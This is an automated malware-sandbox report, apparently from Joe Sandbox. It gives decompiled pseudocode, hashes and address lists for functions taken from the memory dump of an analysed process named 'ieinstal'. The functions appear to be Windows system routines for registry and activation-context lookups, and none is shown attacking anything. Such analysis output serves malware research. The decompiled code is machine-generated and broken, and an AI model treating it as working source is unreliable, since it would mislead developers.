                                                            0x1ec8f197
                                                            0x1ec8f19b
                                                            0x1ec8f1a2
                                                            0x1ec8f1a9
                                                            0x1ec8f1af
                                                            0x1ec8f1b2
                                                            0x1ec8f1b6
                                                            0x1ec8f1b9
                                                            0x1ec8f1c4
                                                            0x1ec8f1d8
                                                            0x1ec8f1df
                                                            0x1ec8f1e3
                                                            0x1ec8f1eb
                                                            0x1ec8f1ee
                                                            0x1ec8f1f4
                                                            0x1ec8f20f
                                                            0x1eccbab7
                                                            0x1eccbabb
                                                            0x1eccbacc
                                                            0x1eccbad1
                                                            0x1ec8f215
                                                            0x1ec8f218
                                                            0x1ec8f226
                                                            0x1ec8f22b
                                                            0x00000000
                                                            0x1ec8f22b
                                                            0x1ec8f1f6
                                                            0x1ec8f1f6
                                                            0x1ec8f1f9
                                                            0x1ec8f1fb
                                                            0x1ec8f1fb
                                                            0x1ec8f1f4
                                                            0x1ec8f191
                                                            0x1ec8f173
                                                            0x1ec8f152
                                                            0x1ec8f203

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                            • Instruction ID: 156be8e3dcbe2f870b41ee4e206577662c05e27b75932618748ef26ad8427648
                                                            • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                            • Instruction Fuzzy Hash: CF519C75504755AFC320CF59C840A6BB7F8FF48710F008A2DF99587690EBB4E954CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECD3540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 75%
                                                            			E1ECD3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x1ed4d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E1EC90BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E1ECD3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E1EC9FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E1ECD3540;
						E1EC9FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E1ECADDD0( &_v1072, _t75, _t79, _t80, _t81);
						E1ECE0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E1EC997C0();
					}
					return E1EC9B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E1ECD3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E1ECD3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E1EC9FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E1EC99650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E1ECD3787(_a4,  &_v352, _t80);
						}
					}
					L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E1EC995D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                            0x1ecd3552
                                                            0x1ecd355a
                                                            0x1ecd355d
                                                            0x1ecd3566
                                                            0x1ecd3567
                                                            0x1ecd357e
                                                            0x1ecd358f
                                                            0x1ecd35a1
                                                            0x1ecd35a5
                                                            0x1ecd366b
                                                            0x1ecd366b
                                                            0x1ecd366d
                                                            0x1ecd3672
                                                            0x1ecd3679
                                                            0x1ecd3685
                                                            0x1ecd368d
                                                            0x1ecd369d
                                                            0x1ecd36a7
                                                            0x1ecd36b8
                                                            0x1ecd36c6
                                                            0x1ecd36c7
                                                            0x1ecd36dc
                                                            0x1ecd36e1
                                                            0x1ecd36e7
                                                            0x1ecd36e9
                                                            0x1ecd36e9
                                                            0x1ecd3703
                                                            0x1ecd3703
                                                            0x1ecd35b5
                                                            0x1ecd35c0
                                                            0x1ecd35c4
                                                            0x00000000
                                                            0x00000000
                                                            0x1ecd35ca
                                                            0x1ecd35d7
                                                            0x1ecd35e2
                                                            0x1ecd35e6
                                                            0x1ecd35e8
                                                            0x1ecd35f5
                                                            0x1ecd35fa
                                                            0x1ecd3603
                                                            0x1ecd3604
                                                            0x1ecd3609
                                                            0x1ecd360a
                                                            0x1ecd3612
                                                            0x1ecd3613
                                                            0x1ecd361e
                                                            0x1ecd3622
                                                            0x1ecd3628
                                                            0x1ecd362f
                                                            0x1ecd362f
                                                            0x1ecd3636
                                                            0x1ecd3638
                                                            0x1ecd363b
                                                            0x1ecd3642
                                                            0x1ecd3642
                                                            0x1ecd3636
                                                            0x1ecd3657
                                                            0x1ecd3657
                                                            0x1ecd365c
                                                            0x1ecd3662
                                                            0x1ecd3669
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: BinaryHash
                                                            • API String ID: 0-2202222882
                                                            • Opcode ID: 3bde389973bce90133b8c8ba62e58c0e27650c2b608622997a8b12d3cc1ec42f
                                                            • Instruction ID: cd4a76fd2afaddc8beafe509d54e2e3c102aa4c44c782d6c2d83ccc8b8f2e26f
                                                            • Opcode Fuzzy Hash: 3bde389973bce90133b8c8ba62e58c0e27650c2b608622997a8b12d3cc1ec42f
                                                            • Instruction Fuzzy Hash: 1D4112B6D0066D9ADB118A54CC81FDEB778BF44714F0046A5AA09AB240DF31AE89CBD4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ED205AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E1ED205AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E1ED207DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E1EC99730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E1ED1A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E1ED1A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E1ED21293(_t79, _v40, E1ED207DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E1EC77D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E1ED1138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                            0x1ed205c5
                                                            0x1ed205ca
                                                            0x1ed205d3
                                                            0x1ed206db
                                                            0x1ed206db
                                                            0x1ed206dd
                                                            0x1ed206e3
                                                            0x1ed206e3
                                                            0x1ed205dd
                                                            0x1ed205e7
                                                            0x1ed205f6
                                                            0x1ed20600
                                                            0x1ed20607
                                                            0x1ed20610
                                                            0x1ed20615
                                                            0x1ed2061a
                                                            0x1ed2061c
                                                            0x1ed2061e
                                                            0x1ed20624
                                                            0x1ed20625
                                                            0x1ed20627
                                                            0x1ed20628
                                                            0x1ed20631
                                                            0x1ed20640
                                                            0x1ed2064d
                                                            0x1ed20654
                                                            0x1ed20654
                                                            0x1ed20631
                                                            0x1ed2066d
                                                            0x1ed20674
                                                            0x00000000
                                                            0x00000000
                                                            0x1ed20692
                                                            0x1ed2069e
                                                            0x1ed206b0
                                                            0x1ed206a0
                                                            0x1ed206a9
                                                            0x1ed206a9
                                                            0x1ed206b8
                                                            0x1ed206d6
                                                            0x1ed206d6
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `
                                                            • API String ID: 0-2679148245
                                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                            • Instruction ID: 7a7897cdefd26cae326db4c8719128a95f36c00f53c6d4079b3c2a0898bd42b1
                                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                            • Instruction Fuzzy Hash: C931A0326043466BE710CE25CD85F9B7BEAAB84758F044739F958AB6C0DB70E904CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1ECD3884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E1ECD3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E1EC99650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L1EC74620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E1EC99650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                            0x1ecd3893
                                                            0x1ecd3896
                                                            0x1ecd3899
                                                            0x1ecd389f
                                                            0x1ecd38a0
                                                            0x1ecd38a4
                                                            0x1ecd38a9
                                                            0x1ecd38ac
                                                            0x1ecd38ad
                                                            0x1ecd38ae
                                                            0x1ecd38af
                                                            0x1ecd38b1
                                                            0x1ecd38b4
                                                            0x1ecd38bb
                                                            0x1ecd38bc
                                                            0x1ecd38bd
                                                            0x1ecd38c4
                                                            0x1ecd38c8
                                                            0x1ecd38ca
                                                            0x1ecd38ca
                                                            0x1ecd38d5
                                                            0x1ecd393e
                                                            0x1ecd3940
                                                            0x1ecd3942
                                                            0x1ecd3952
                                                            0x1ecd3954
                                                            0x1ecd3961
                                                            0x1ecd3961
                                                            0x1ecd3967
                                                            0x1ecd396e
                                                            0x1ecd396e
                                                            0x1ecd3947
                                                            0x1ecd394c
                                                            0x00000000
                                                            0x1ecd394c
                                                            0x1ecd38ea
                                                            0x1ecd38ee
                                                            0x1ecd38f8
                                                            0x1ecd38f9
                                                            0x1ecd38ff
                                                            0x1ecd3900
                                                            0x1ecd3902
                                                            0x1ecd3903
                                                            0x1ecd390b
                                                            0x1ecd390f
                                                            0x1ecd3950
                                                            0x00000000
                                                            0x1ecd3950
                                                            0x1ecd3915
                                                            0x1ecd391d
                                                            0x1ecd391d
                                                            0x1ecd3922
                                                            0x1ecd3926
                                                            0x00000000
                                                            0x1ecd3928
                                                            0x1ecd392b
                                                            0x1ecd392b
                                                            0x1ecd3935
                                                            0x1ecd3937
                                                            0x1ecd3937
                                                            0x00000000
                                                            0x1ecd3935
                                                            0x1ecd3926
                                                            0x1ecd38f0
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: BinaryName
                                                            • API String ID: 0-215506332
                                                            • Opcode ID: 4127edd0e1f3495a18fa0fe9ed97644c9a50f176f4f26f3bd1dbe29e6378e82e
                                                            • Instruction ID: d85dbdf7b4dd5f539da7839a40d30d4d73e0ef4b2ca6224cd51bbcaa2866838a
                                                            • Opcode Fuzzy Hash: 4127edd0e1f3495a18fa0fe9ed97644c9a50f176f4f26f3bd1dbe29e6378e82e
                                                            • Instruction Fuzzy Hash: 5F31F136D0060AAFDB15CB5DCD41EAFB775FF80B20F014229AA44A7240D7329E48C7E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC8D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 33%
                                                            			E1EC8D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x1ed4d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E1EC74120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E1EC9B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E1EC998D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E1EC995D0();
					L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                            0x1ec8d29c
                                                            0x1ec8d2a6
                                                            0x1ec8d2b1
                                                            0x1ec8d2b5
                                                            0x1ec8d2b6
                                                            0x1ec8d2bc
                                                            0x1ec8d2bd
                                                            0x1ec8d2be
                                                            0x1ec8d2bf
                                                            0x1ec8d2c2
                                                            0x1ec8d2c4
                                                            0x1ec8d2cc
                                                            0x1ec8d384
                                                            0x1ec8d34b
                                                            0x1ec8d34f
                                                            0x1ec8d350
                                                            0x1ec8d351
                                                            0x1ec8d35c
                                                            0x1ec8d35c
                                                            0x1ec8d2d6
                                                            0x1ec8d2da
                                                            0x1ec8d2e1
                                                            0x1ec8d361
                                                            0x1ec8d369
                                                            0x1ec8d36d
                                                            0x1ec8d2e3
                                                            0x1ec8d2e3
                                                            0x1ec8d2e3
                                                            0x1ec8d2e5
                                                            0x1ec8d2ed
                                                            0x1ec8d2f5
                                                            0x1ec8d2fa
                                                            0x1ec8d302
                                                            0x1ec8d303
                                                            0x1ec8d30b
                                                            0x1ec8d30f
                                                            0x1ec8d313
                                                            0x1ec8d318
                                                            0x1ec8d31c
                                                            0x1ec8d320
                                                            0x1ec8d379
                                                            0x1ec8d37d
                                                            0x00000000
                                                            0x00000000
                                                            0x1eccaffe
                                                            0x1eccb001
                                                            0x1eccb011
                                                            0x00000000
                                                            0x1ec8d322
                                                            0x1ec8d322
                                                            0x1ec8d330
                                                            0x1ec8d337
                                                            0x1ec8d35d
                                                            0x1ec8d339
                                                            0x1ec8d33f
                                                            0x1ec8d38c
                                                            0x1ec8d38c
                                                            0x1ec8d33f
                                                            0x1ec8d349
                                                            0x00000000
                                                            0x1ec8d349

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 5ec42c64d106f1108de33e0ad77f7f3762f696cb0bf23d9d309b15add58580c5
                                                            • Instruction ID: 997597f4ecf81a7e5b11f8f3be0bb7c6c3d125285c76957deb387248d42a4dc5
                                                            • Opcode Fuzzy Hash: 5ec42c64d106f1108de33e0ad77f7f3762f696cb0bf23d9d309b15add58580c5
                                                            • Instruction Fuzzy Hash: F3315AB6548345AFC311CF29CE80E5BBBF9EB99658F000A2EF99493310D634DD45CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC61B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E1EC61B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E1EC9BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E1EC9A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E1EC9A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L1EC777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L1EC74620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                            0x1ec61b8f
                                                            0x1ec61b9a
                                                            0x1ec61b9c
                                                            0x1ec61b9e
                                                            0x1ec61ba3
                                                            0x1ecb7010
                                                            0x1ecb7010
                                                            0x00000000
                                                            0x1ec61ba9
                                                            0x1ec61ba9
                                                            0x1ec61bae
                                                            0x00000000
                                                            0x1ec61bc5
                                                            0x1ec61bca
                                                            0x1ec61bcf
                                                            0x1ec61bd0
                                                            0x1ec61bd1
                                                            0x1ec61bd2
                                                            0x1ec61bd6
                                                            0x1ec61bdc
                                                            0x1ec61be0
                                                            0x1ecb6ffc
                                                            0x1ecb7000
                                                            0x00000000
                                                            0x1ecb7006
                                                            0x1ecb7009
                                                            0x1ecb7009
                                                            0x1ec61be6
                                                            0x1ec61bec
                                                            0x1ec61c0b
                                                            0x1ec61c0b
                                                            0x1ec61c0c
                                                            0x1ec61c11
                                                            0x1ec61c12
                                                            0x1ec61c15
                                                            0x1ec61c1b
                                                            0x1ec61c1f
                                                            0x1ec61c31
                                                            0x1ec61c33
                                                            0x1ecb7026
                                                            0x1ecb7026
                                                            0x1ec61c21
                                                            0x1ec61c24
                                                            0x1ec61c24
                                                            0x1ec61bee
                                                            0x1ec61bee
                                                            0x1ec61bf2
                                                            0x1ec61c3a
                                                            0x1ec61bf4
                                                            0x1ec61bf4
                                                            0x1ec61c05
                                                            0x1ec61c05
                                                            0x1ec61c09
                                                            0x1ec61c3e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec61c09
                                                            0x1ec61bec
                                                            0x1ec61be0
                                                            0x1ec61bae
                                                            0x1ec61c2e

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: WindowsExcludedProcs
                                                            • API String ID: 0-3583428290
                                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                            • Instruction ID: 85afe60875351b087000cbeaf1917f131b5b2a4ecf2e514590df0f25e899416b
                                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                            • Instruction Fuzzy Hash: AF21B377901668BBCB118A5ACC80F5F77AAAF89B52F064726FD189B304DA30DD0097A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC7F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E1EC7F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                            0x1ec7f71d
                                                            0x1ec7f722
                                                            0x1ec7f726
                                                            0x1ecc4770
                                                            0x1ec7f765
                                                            0x1ec7f769
                                                            0x1ec7f769
                                                            0x1ec7f732
                                                            0x1ecc477a
                                                            0x00000000
                                                            0x1ecc477a
                                                            0x1ec7f738
                                                            0x1ec7f73a
                                                            0x1ec7f73c
                                                            0x1ec7f73f
                                                            0x1ec7f746
                                                            0x1ec7f778
                                                            0x1ec7f7a9
                                                            0x1ec7f7a9
                                                            0x1ec7f754
                                                            0x1ec7f75a
                                                            0x1ec7f75d
                                                            0x1ec7f75f
                                                            0x1ec7f761
                                                            0x1ec7f76f
                                                            0x1ec7f771
                                                            0x1ec7f771
                                                            0x1ec7f76f
                                                            0x1ec7f763
                                                            0x00000000
                                                            0x1ec7f763
                                                            0x1ec7f77d
                                                            0x1ec7f7a3
                                                            0x1ec7f7a5
                                                            0x00000000
                                                            0x1ec7f7a5
                                                            0x1ec7f77f
                                                            0x1ec7f782
                                                            0x1ec7f784
                                                            0x1ec7f786
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec7f788
                                                            0x1ec7f748
                                                            0x1ec7f74d
                                                            0x1ec7f78d
                                                            0x1ec7f793
                                                            0x1ec7f7b7
                                                            0x1ec7f7bc
                                                            0x00000000
                                                            0x1ec7f7bc
                                                            0x1ec7f798
                                                            0x00000000
                                                            0x00000000
                                                            0x1ec7f79d
                                                            0x1ec7f7b0
                                                            0x00000000
                                                            0x1ec7f7b0
